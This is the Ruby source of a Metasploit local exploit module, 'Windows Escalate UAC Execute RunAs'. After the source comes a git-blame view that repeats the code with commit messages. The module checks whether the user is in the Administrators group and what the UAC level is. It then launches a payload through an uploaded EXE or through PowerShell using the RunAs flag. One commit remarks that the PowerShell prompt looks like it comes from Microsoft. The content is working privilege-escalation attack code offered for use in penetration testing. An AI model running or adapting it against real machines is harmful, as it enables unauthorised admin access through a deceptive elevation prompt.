metasploit-framework/modules/exploits/windows/local/ask.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Escalate UAC Execute RunAs',
      'Description'   => %q{
        This module will attempt to elevate execution level using
        the ShellExecute undocumented RunAs flag to bypass low
        UAC settings.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
          'mubix', # Original technique
          'b00stfr3ak' # Added powershell option
      ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       => [ [ 'Windows', {} ] ],
      'DefaultTarget' => 0,
      'References'    => [
        [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
      ],
      'DisclosureDate'=> "Jan 3 2012",
    ))

    register_options([
      OptString.new("FILENAME", [ false, "File name on disk"]),
      OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),
      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
    ])

  end

  def check
    session.readline
    print_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
      return Exploit::CheckCode::Unknown
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
        return Exploit::CheckCode::Vulnerable
      else
        print_error("Not in admins group, cannot escalate with this module")
        return Exploit::CheckCode::Safe
      end
    end
  end

  def exploit
    admin_check = check
    if admin_check.join =~ /safe/
      fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
    end
    if is_uac_enabled?
      print_status "UAC is Enabled, checking level..."
    else
      if is_in_admin_group?
        fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
      else
        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
      end
    end
    case get_uac_level
      when UAC_NO_PROMPT
        print_good "UAC is not enabled, no prompt for the user"
      else
        print_status "The user will be prompted, wait for them to click 'Ok'"
    end
    #
    # Generate payload and random names for upload
    #
    case datastore["TECHNIQUE"]
      when "EXE"
        execute_exe(datastore["FILENAME"],datastore["PATH"],datastore["UPLOAD"])
      when "PSH"
        execute_psh
    end
  end
end
add RunAs ask module 2012-10-06 04:51:44 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
Fix file header comment [See #1555] 2013-03-07 23:53:19 +00:00			`# http://metasploit.com/framework/`
add RunAs ask module 2012-10-06 04:51:44 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Local`
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00			`Rank = ExcellentRanking`

Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`include Post::Windows::Priv`
			`include Post::Windows::Runas`
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00
			`def initialize(info={})`
			`super( update_info( info,`
			`'Name' => 'Windows Escalate UAC Execute RunAs',`
			`'Description' => %q{`
			`This module will attempt to elevate execution level using`
			`the ShellExecute undocumented RunAs flag to bypass low`
			`UAC settings.`
			`},`
			`'License' => MSF_LICENSE,`
Added PSH option to windows/local/ask exploit Gives you the ability to use powershell to 'ask' for admin rights if the user has them. Using powershell makes the pop up blue instead of orange and states that the company is Microsoft, it also doesn't drop an exe on the system. Looks like 32 bit https works but if you migrate out you loose priv and if you run cachedump the session hangs. 2013-10-19 07:15:38 +00:00			`'Author' => [`
			`'mubix', # Original technique`
			`'b00stfr3ak' # Added powershell option`
			`],`
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'meterpreter' ],`
			`'Targets' => [ [ 'Windows', {} ] ],`
			`'DefaultTarget' => 0,`
			`'References' => [`
			`[ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]`
			`],`
Added PSH option to windows/local/ask exploit Gives you the ability to use powershell to 'ask' for admin rights if the user has them. Using powershell makes the pop up blue instead of orange and states that the company is Microsoft, it also doesn't drop an exe on the system. Looks like 32 bit https works but if you migrate out you loose priv and if you run cachedump the session hangs. 2013-10-19 07:15:38 +00:00			`'DisclosureDate'=> "Jan 3 2012",`
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00			`))`

			`register_options([`
			`OptString.new("FILENAME", [ false, "File name on disk"]),`
			`OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),`
Updated with comments from jlee-r7 and Meatballs1 Added fail_with instead of just print_error figured a way to execute the cmd_psh_payload with out using gsub added case statment for datastore['TECHNIQUE'] 2013-10-20 08:15:51 +00:00			`OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),`
Added PSH option to windows/local/ask exploit Gives you the ability to use powershell to 'ask' for admin rights if the user has them. Using powershell makes the pop up blue instead of orange and states that the company is Microsoft, it also doesn't drop an exe on the system. Looks like 32 bit https works but if you migrate out you loose priv and if you run cachedump the session hangs. 2013-10-19 07:15:38 +00:00			`OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),`
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00			`])`

			`end`

Added check method The method checks to see if the user is a part of the admin group. If the user is the exploit continues, if not the exploit stops because it will prompt the user for a password instead of just clicking ok. 2013-10-21 18:57:50 +00:00			`def check`
			`session.readline`
			`print_status('Checking admin status...')`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`admin_group = is_in_admin_group?`
			`if admin_group.nil?`
			`print_error('Either whoami is not there or failed to execute')`
			`print_error('Continuing under assumption you already checked...')`
			`return Exploit::CheckCode::Unknown`
Added check method The method checks to see if the user is a part of the admin group. If the user is the exploit continues, if not the exploit stops because it will prompt the user for a password instead of just clicking ok. 2013-10-21 18:57:50 +00:00			`else`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`if admin_group`
Added check method The method checks to see if the user is a part of the admin group. If the user is the exploit continues, if not the exploit stops because it will prompt the user for a password instead of just clicking ok. 2013-10-21 18:57:50 +00:00			`print_good('Part of Administrators group! Continuing...')`
			`return Exploit::CheckCode::Vulnerable`
			`else`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`print_error("Not in admins group, cannot escalate with this module")`
Added check method The method checks to see if the user is a part of the admin group. If the user is the exploit continues, if not the exploit stops because it will prompt the user for a password instead of just clicking ok. 2013-10-21 18:57:50 +00:00			`return Exploit::CheckCode::Safe`
			`end`
			`end`
			`end`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00			`def exploit`
Added check method The method checks to see if the user is a part of the admin group. If the user is the exploit continues, if not the exploit stops because it will prompt the user for a password instead of just clicking ok. 2013-10-21 18:57:50 +00:00			`admin_check = check`
			`if admin_check.join =~ /safe/`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")`
Added check method The method checks to see if the user is a part of the admin group. If the user is the exploit continues, if not the exploit stops because it will prompt the user for a password instead of just clicking ok. 2013-10-21 18:57:50 +00:00			`end`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`if is_uac_enabled?`
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00			`print_status "UAC is Enabled, checking level..."`
			`else`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`if is_in_admin_group?`
			`fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")`
			`else`
			`fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")`
			`end`
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00			`end`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`case get_uac_level`
			`when UAC_NO_PROMPT`
Updated with comments from jlee-r7 and Meatballs1 Added fail_with instead of just print_error figured a way to execute the cmd_psh_payload with out using gsub added case statment for datastore['TECHNIQUE'] 2013-10-20 08:15:51 +00:00			`print_good "UAC is not enabled, no prompt for the user"`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`else`
			`print_status "The user will be prompted, wait for them to click 'Ok'"`
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00			`end`
			`#`
			`# Generate payload and random names for upload`
			`#`
Updated with comments from jlee-r7 and Meatballs1 Added fail_with instead of just print_error figured a way to execute the cmd_psh_payload with out using gsub added case statment for datastore['TECHNIQUE'] 2013-10-20 08:15:51 +00:00			`case datastore["TECHNIQUE"]`
			`when "EXE"`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`execute_exe(datastore["FILENAME"],datastore["PATH"],datastore["UPLOAD"])`
Updated with comments from jlee-r7 and Meatballs1 Added fail_with instead of just print_error figured a way to execute the cmd_psh_payload with out using gsub added case statment for datastore['TECHNIQUE'] 2013-10-20 08:15:51 +00:00			`when "PSH"`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`execute_psh`
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00			`end`
			`end`
Added priv lib and runas lib Cleaned up code with using the new lib files 2013-10-25 21:05:33 +00:00			`end`